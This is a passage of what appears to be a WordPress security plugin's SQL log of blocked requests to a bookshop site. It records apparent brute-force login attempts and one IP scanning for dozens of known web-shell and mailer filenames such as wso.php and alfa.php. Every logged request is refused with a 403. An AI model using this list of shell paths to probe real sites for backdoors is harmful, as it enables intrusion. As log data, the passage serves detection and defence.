Safari\\/537.36\"}','GDTkEwIxlLvCpfm1PBU0zQaq',0,1637909117.7208,497,'','POST',403,0,600,0,1,'',0),('52.186.26.189',884611773,'','https://ashbooks.co.uk/mt/DIZ.php','','{\"1\":\"python-requests\\/2.26.0\"}','MBjOR9Ft14agc6JfrZCIPw8G',0,1637909722.7858,186,'','GET',403,0,700,0,1,'',0),('52.186.26.189',884611773,'','https://ashbooks.co.uk/DKIZ.php?DKIZ','','{\"1\":\"python-requests\\/2.26.0\"}','OcnSwofJPY3ubzhptVdsql7R',0,1637909723.4852,686,'','GET',403,0,700,0,1,'',0),('94.23.83.103',1578586983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','XWkCRQHeJ04OPTfbMqu7NE6s',0,1637912701.0196,619,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','HK9yWk2mhUMrx4do5iXRPZVN',0,1637913417.0922,1260,'','POST',403,0,600,0,1,'',0),('173.212.235.115',2916412275,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','9ZrRmgnDxtHqpsPv0aVTWyOf',0,1637914985.7766,726,'','POST',403,0,600,0,1,'',0),('128.199.220.215',2160581847,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','joRiT8pKVceFnWCNvML1zfmG',0,1637916054.5001,467,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','Oy2AleuCmHgLD05Qkt3GR6Pw',0,1637917801.9770,427,'','POST',403,0,600,0,1,'',0),('68.183.108.18',1152871442,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','MX6KeEtTy0wQ5SUZOg8JYHFP',0,1637921749.0229,456,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','WbiqPvemQo64r2O1axVNY0Xn',0,1637922169.4839,441,'','POST',403,0,600,0,1,'',0),('159.89.201.91',2673461595,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','RBNQ1Zm9WroydzugKbhAMfkP',0,1637922842.5287,469,'','POST',403,0,600,0,1,'',0),('103.130.218.178',1736628914,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','oHdEGXk0xrWnf1pJlNICRm58',0,1637923955.4176,276,'','POST',403,0,600,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/dz.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BpctJf4omZV3GzQlDjFWaKw5',0,1637925592.0794,740,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/LeafE.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JUQVnehrcADqTR49NisMHapl',0,1637925592.9654,464,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1WQrChqwkGldDaL6Eys5pBKP',0,1637925593.5664,164,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vMaE5jWredcgOKuYFqwRl3pX',0,1637925593.8715,121,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nNLOsdtc9BvVl4xUkuXCa2qI',0,1637925594.1268,388,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CBQme8ktNYx2aHqfuzcLniUr',0,1637925594.6804,131,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','voPAzI9epUut7NqjYmdSCF0w',0,1637925594.9468,413,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SU7HczyRnsd21CZJO9DpLiIl',0,1637925595.4863,127,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8UThtIS2q5Ls4plJ9a6omzu1',0,1637925595.7460,158,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','L3PlUm27hdOsAvtMBfInqzri',0,1637925596.0395,390,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0menMd3JFfUN4KtI98RuCZqp',0,1637925596.5665,159,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','L4eVij0kORpWlqZYMbxg3yUG',0,1637925596.8597,137,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','p4nzKLNv0ftlMPj81iARhUGD',0,1637925597.1249,454,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x0sWDN76H3Ylm9Z2aqzhc1fp',0,1637925597.7301,158,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2hHWBmf4YO8n36cxy05DqtF1',0,1637925598.0180,390,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w1psz7XKDtmFCTPo0E5vcQUV',0,1637925598.5409,126,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sCJtEwoT9OWA40GnULPV3BF7',0,1637925598.8873,117,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','glpOAnzvGWFxR6DPSTVYwUdH',0,1637925599.1394,398,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gLlX3izZrH06DU7G9duBMJ5N',0,1637925599.6811,140,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Gor5eYDAiF1SZy07jKHbINkt',0,1637925599.9485,393,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/dr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RZLDa2H0E9edhQ4tcv5ubUSI',0,1637925600.4726,120,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vstZdxTmGKp79qIVyDzkWEa8',0,1637925600.7268,158,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','t7sT4YVX2M8ulA6KczHDaW1N',0,1637925601.0224,396,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dI5cSQhuwYngzWEVp4Kbo1Hv',0,1637925601.5456,119,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ElkwfaL6xPQBN4YCOvgsW2M1',0,1637925601.7935,118,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','muDSdXN579F4Csl2LBPjaIqv',0,1637925602.0479,419,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uCrXJ3SaOdRGZmHWNxUFysfV',0,1637925602.6327,405,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','v4TshANmux8nS0EOtIw1DJMp',0,1637925603.5250,695,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OtBgDaWseyN9r6KxcRPw8huG',0,1637925604.3481,126,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','omNEDwgRZ0PVXezF5UbBjpJ2',0,1637925604.6082,126,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y41GQ8F7oevHun32sbyZKxz9',0,1637925604.8680,117,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-content/wp-logins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qrvNTCuVaORpBE0FYDS2K3tP',0,1637925605.1282,652,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','op0j9AIFcfr5ClqEQu1RsvBh',0,1637925605.9167,170,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3pDOwSkjqztFJrlRoh6sdG5b',0,1637925606.2321,399,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2EDQleW4PAF1GOU6tMHkK8Rg',0,1637925606.7610,117,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-content/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sRPVrCNT1nZjEAfdh5ew74Ko',0,1637925607.0040,394,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0QjO7WqUY2gRwSLKbpIH6s5X',0,1637925607.5314,125,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kgYZcQsv2R3mrNiqbTJOaUWd',0,1637925607.7911,119,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','32BvQWZEfi14RVyMexJ6GdCU',0,1637925608.0382,393,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hFN9H2lJ0jYspGr48Mv3n5Zy',0,1637925608.5664,120,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hcTDI1PHpuCabo6lZNtJweVY',0,1637925608.8213,123,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FWQJv8MAS4fwHkj6Dyg9htPN',0,1637925609.0796,398,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RSGclMQ9NwbHuvq7VE2tJpTf',0,1637925609.6070,129,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9Z6d5fRPJO3exYSB8krMKcXl',0,1637925609.8850,127,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zlLqnp1KHQdxADERM8Y6WXGt',0,1637925610.1385,396,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','V4fd7o0iSGgBAb6qRL8wa19D',0,1637925610.6673,125,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YjbPItRUeHWzQVM6OkFfrd3y',0,1637925610.9271,118,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YEmjIuHZl8dfy0QFOog7iKRr',0,1637925611.1797,395,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XgERtPVKk4bGJZsTanHNc8Qv',0,1637925611.7210,131,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wACkIdgaDjQt1c7bX0mOvSPx',0,1637925611.9884,393,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tVu69QlThrN3GJ04WCd1MaAo',0,1637925612.5188,132,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pbXRIV5cZCti7h0wHl3BSeWY',0,1637925612.7878,125,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r7ob5ivA9wS3euyckFBznYsP',0,1637925613.0477,392,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UGNZo60brf4Rjx7uBzS8VmDK',0,1637925613.5787,139,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uMh2ClELyIOir9zaxcv4t6dX',0,1637925613.8567,127,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8jzdHGy56wJvbQXOf3NkWL0A',0,1637925614.1198,432,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fsPFt15kqy9AXnUa8xOYErIz',0,1637925614.6932,120,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','68XARHWhopc7P3xfULgzC5kF',0,1637925614.9424,419,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/.fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xpXR3C64ro5Wa8QLFv2AhBcJ',0,1637925615.4986,129,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dc1v6NZlK7Eqiwr3gXOHVSkY',0,1637925615.7566,135,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NVOIR21kxcbuivyFqK7pwr9g',0,1637925616.0250,712,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TO8X5CH1FgiWN7AIjLroPeEt',0,1637925616.8728,143,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BNhRE25uds03LkH49yXIlDqO',0,1637925617.1545,386,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wdOsjET65De1X4xyk378z0Iq',0,1637925617.6765,118,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pe8xfn5ArJ0akV1utwPjK3IE',0,1637925617.9306,402,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WPJR73Y1DolThy6gdqwLAKHs',0,1637925618.4964,131,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4x0dCHBPJv8RWhqOyKS6aGDT',0,1637925618.7619,129,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cgzBiJVmY4dCGHRXPNAaKIuv',0,1637925619.0387,433,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1agb2oEe5vHl0IS98RWuDyBZ',0,1637925619.6053,132,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lXAG4LnTyPtcSmpoN1V78UWe',0,1637925619.8720,128,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 